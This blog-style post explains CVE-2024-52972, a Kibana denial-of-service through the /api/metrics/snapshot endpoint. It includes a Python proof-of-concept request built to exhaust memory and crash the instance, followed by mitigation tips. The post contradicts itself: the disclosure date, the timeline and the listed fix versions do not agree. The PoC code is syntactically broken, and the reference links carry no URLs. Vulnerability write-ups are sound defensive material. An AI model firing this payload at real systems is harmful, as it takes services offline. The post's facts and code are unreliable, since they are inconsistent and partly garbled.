CVE-2024-52972 - Kibana API Vulnerability Lets Attackers Crash Your Instance with a Simple Request

On June 7, 2024, a new vulnerability was disclosed, tracked as CVE-2024-52972, affecting Kibana — the popular open-source analytics and visualization tool from Elastic. This security issue allows attackers with legitimate read access to crash the entire Kibana instance by abusing the /api/metrics/snapshot endpoint.

This post will break down the vulnerability, show how it can be exploited, and provide you with links and mitigation tips.

Vulnerability Breakdown: Allocation of Resources Without Limits

Kibana provides access to systems metrics and logs through its Observability plugin, allowing users to generate insightful data snapshots at the endpoint /api/metrics/snapshot. However, the code behind this endpoint failed to limit or throttle resource allocation when processing requests.

That means a user can trigger Kibana to allocate a massive amount of memory and compute resources by sending a specially crafted request. If repeated or pushed to extreme values, this causes Kibana to exhaust system resources and crash.

What’s Exploitable?

- The /api/metrics/snapshot endpoint, by setting certain filters or expanding the scope of the snapshot.

Example Exploit (Python Snippet)

Below is a proof of concept Python snippet that can be used to demonstrate a simple denial-of-service attack against a vulnerable Kibana instance. Only use this on systems you own or have permission to test.

import requests

# Replace with your Kibana URL and authentication details
kibana_url = 'https://your-kibana-instance:5601';
api_path = '/api/metrics/snapshot'
headers = {
    'kbn-xsrf': 'reporting',
    'Content-Type': 'application/json',
    'Authorization': 'Bearer YOUR_ACCESS_TOKEN'
}

# Payload triggers very large snapshot
data = {
  "timerange": {
    "interval": "1s",
    "to": 9999999999999,    # Way off in the future
    "from":                # Epoch
  },
  "metrics": [{"type": "memory"}],
  "limit": 100000000      # Crazy high value
}

resp = requests.post(kibana_url + api_path, headers=headers, json=data, verify=False)
print(resp.status_code, resp.text)

What This Does:
It requests an impossibly large snapshot that forces Kibana to allocate tons of memory, eventually making it crash or become unresponsive.

Original Reference Links

- NVD entry for CVE-2024-52972
- Elastic Security Advisory (Official disclosure)
- Kibana GitHub issues (Check for the latest advisory)

Upgrade!

- Elastic fixed this in the 8.11.1, 8.10.4, and 8.9.3 releases of Kibana. Update ASAP!

Limit who can get read access to Observability features.

- Rate limiting/reverse proxies:
- Use an API gateway or nginx/apache to rate-limit requests to sensitive endpoints.

Conclusion

CVE-2024-52972 is a critical reminder that even simple API endpoints can wreak havoc if resource allocation isn't tightly controlled. If you use Kibana, update right away and take steps to restrict access to Observability features.

Stay safe — and always review your configs after an update!


Did you find this post helpful? Let us know.


*Note: This is an exclusive explanation and breakdown based on public disclosures and technical documentation. For deepest safety, always consult the official advisories for your usages.*

Timeline

Published on: 01/23/2025 07:15:08 UTC